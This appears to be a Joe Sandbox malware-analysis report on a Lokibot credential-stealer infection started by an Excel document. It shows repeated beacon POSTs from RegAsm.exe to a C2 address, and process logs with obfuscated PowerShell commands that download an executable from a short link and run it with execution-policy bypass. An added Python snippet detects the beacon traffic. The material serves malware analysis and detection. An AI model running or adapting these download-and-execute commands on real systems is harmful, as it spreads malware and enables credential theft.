                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:33.398943901 CET  1227                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:33.560619116 CET  1228                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         66          192.168.2.22  49233        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:33.770155907 CET  1229                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:33.939742088 CET  1229                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


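Added example, not part of the Joe Sandbox report: every POST captured above carries the same request head (the "Mozilla/4.08 (Charon; Inferno)" User-Agent, a non-standard Content-Key header, a binary octet-stream body sent to a .php endpoint), and sessions 56 through 67 are spaced roughly 0.4 s apart, so a detection can key on the request shape and confirm it with the beacon cadence. The request text and the timestamp list below are constructed from the sessions shown on this page; the 149-byte body is not on the page and is omitted; the indicator labels, the 25% jitter threshold and the minimum of three gaps are this example's own assumptions.

```python
import re
from datetime import datetime
from statistics import median
from typing import Dict, List, Tuple

# Lokibot beacon User-Agent, as seen in every session captured above.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"

# Constructed sample: the request line and headers of one captured POST, copied
# from the sessions above. The 149-byte body is not shown on the page and is omitted.
SAMPLE_REQUEST = (
    "POST /morx/1/cgi.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 185.206.215.56\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 598F9AF4\r\n"
    "Content-Length: 149\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed list: the OUT timestamps of sessions 56 through 67 above, in log order.
SAMPLE_TIMESTAMPS = [
    "Jan 5, 2021 19:06:30.014888048 CET",
    "Jan 5, 2021 19:06:30.409914970 CET",
    "Jan 5, 2021 19:06:30.786520004 CET",
    "Jan 5, 2021 19:06:31.159641027 CET",
    "Jan 5, 2021 19:06:31.542985916 CET",
    "Jan 5, 2021 19:06:31.903232098 CET",
    "Jan 5, 2021 19:06:32.262785912 CET",
    "Jan 5, 2021 19:06:32.647726059 CET",
    "Jan 5, 2021 19:06:33.031393051 CET",
    "Jan 5, 2021 19:06:33.398943901 CET",
    "Jan 5, 2021 19:06:33.770155907 CET",
    "Jan 5, 2021 19:06:34.165365934 CET",
]


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP request head into (method, path, header dict keyed by lowercase name)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def lokibot_indicators(raw: str) -> List[str]:
    """Return the Lokibot traits present in a request head; an empty list means no match."""
    method, path, h = parse_request(raw)
    hits: List[str] = []
    if h.get("user-agent") == LOKIBOT_UA:
        hits.append("lokibot user-agent")
    if "content-key" in h:  # non-standard header carried by the captured beacons
        hits.append("content-key header")
    if (method == "POST" and path.endswith(".php")
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("binary octet-stream POST to .php")
    return hits


# Keep the first six fractional digits (datetime resolution) and drop the zone name.
_TS = re.compile(r"^(.+?\.\d{6})\d*\s+\w+$")


def parse_timestamp(s: str) -> datetime:
    """Parse the sandbox's 'Mon D, YYYY HH:MM:SS.nnnnnnnnn ZONE' format; the zone is ignored."""
    m = _TS.match(s)
    if not m:
        raise ValueError(f"unrecognised timestamp: {s!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def beacon_intervals(stamps: List[str]) -> List[float]:
    """Seconds between consecutive beacons, in chronological order."""
    ts = sorted(parse_timestamp(s) for s in stamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def is_periodic(intervals: List[float], jitter: float = 0.25) -> bool:
    """True when every gap lies within +/- jitter of the median gap (threshold is an assumption)."""
    if len(intervals) < 3:
        return False
    med = median(intervals)
    return all(abs(i - med) <= jitter * med for i in intervals)


if __name__ == "__main__":
    print("indicators:", lokibot_indicators(SAMPLE_REQUEST))
    gaps = beacon_intervals(SAMPLE_TIMESTAMPS)
    print("median beacon gap: %.3fs, periodic: %s" % (median(gaps), is_periodic(gaps)))
```

Run stand-alone it reports all three indicators and a median gap of about 0.38 s. Note that the server answered every beacon here with 404 "File not found.", so the C2 path was already dead during this run; a detection that waits for a 200 from the panel would miss the infection, while the request shape and the fact that RegAsm.exe is the process making these POSTs do not depend on the server being up.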
                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         67          192.168.2.22  49234        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:34.165365934 CET  1230                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:34.334827900 CET1230INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
68 | 192.168.2.22 | 49235 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:34.564013004 CET | 1231 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:34.721364021 CET | 1232 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:33 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
69 | 192.168.2.22 | 49236 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:34.935154915 CET | 1232 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:35.122327089 CET | 1233 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:34 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.22 | 49174 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:10.067265987 CET | 1151 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:10.236854076 CET | 1151 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:09 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.22 | 49237 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:35.342015982 CET | 1234 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:35.512182951 CET | 1234 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:34 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 192.168.2.22 | 49238 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:35.726449013 CET | 1235 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:35.894052029 CET | 1236 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:34 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.22 | 49239 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.22 | 49240 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.22 | 49241 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.22 | 49242 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 192.168.2.22 | 49243 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 192.168.2.22 | 49244 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.22 | 49245 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 192.168.2.22 | 49246 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.22 | 49175 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:10.499610901 CET | 1152 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:10.673142910 CET | 1153 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:09 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
80 | 192.168.2.22 | 49247 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
81 | 192.168.2.22 | 49248 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
82 | 192.168.2.22 | 49249 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
83 | 192.168.2.22 | 49250 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
84 | 192.168.2.22 | 49251 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
85 | 192.168.2.22 | 49252 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
86 | 192.168.2.22 | 49253 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
87 | 192.168.2.22 | 49254 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
88 | 192.168.2.22 | 49255 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
89 | 192.168.2.22 | 49256 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.22 | 49176 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:10.888135910 CET | 1153 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:11.065620899 CET | 1154 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:10 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
90 | 192.168.2.22 | 49257 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
91 | 192.168.2.22 | 49258 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
92 | 192.168.2.22 | 49259 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
93 | 192.168.2.22 | 49260 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
94 | 192.168.2.22 | 49261 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
95 | 192.168.2.22 | 49262 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
96 | 192.168.2.22 | 49263 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
97 | 192.168.2.22 | 49264 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
98 | 192.168.2.22 | 49265 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        99192.168.2.2249266185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        HTTPS Packets

                                                                                        Timestamp:Jan 5, 2021 19:05:20.849750996 CET
                                                                                        Source IP:104.22.0.232
                                                                                        Source Port:443
                                                                                        Dest IP:192.168.2.22
                                                                                        Dest Port:49165
                                                                                        Subject:CN=www.cutt.ly
                                                                                        Issuer:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                        Not Before:Sat Feb 08 01:00:00 CET 2020
                                                                                        Not After:Thu Apr 08 14:00:00 CEST 2021
                                                                                        JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                                                        JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

                                                                                        Intermediate certificate in the same chain:
                                                                                        Subject:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                        Issuer:CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                        Not Before:Thu Nov 02 13:24:33 CET 2017
                                                                                        Not After:Tue Nov 02 13:24:33 CET 2027

                                                                                        Code Manipulations

                                                                                        Statistics

                                                                                        Behavior

                                                                                        System Behavior

                                                                                        General

                                                                                        Start time:19:04:38
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                        Imagebase:0x13f7f0000
                                                                                        File size:27641504 bytes
                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:08
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Imagebase:0x12a0000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
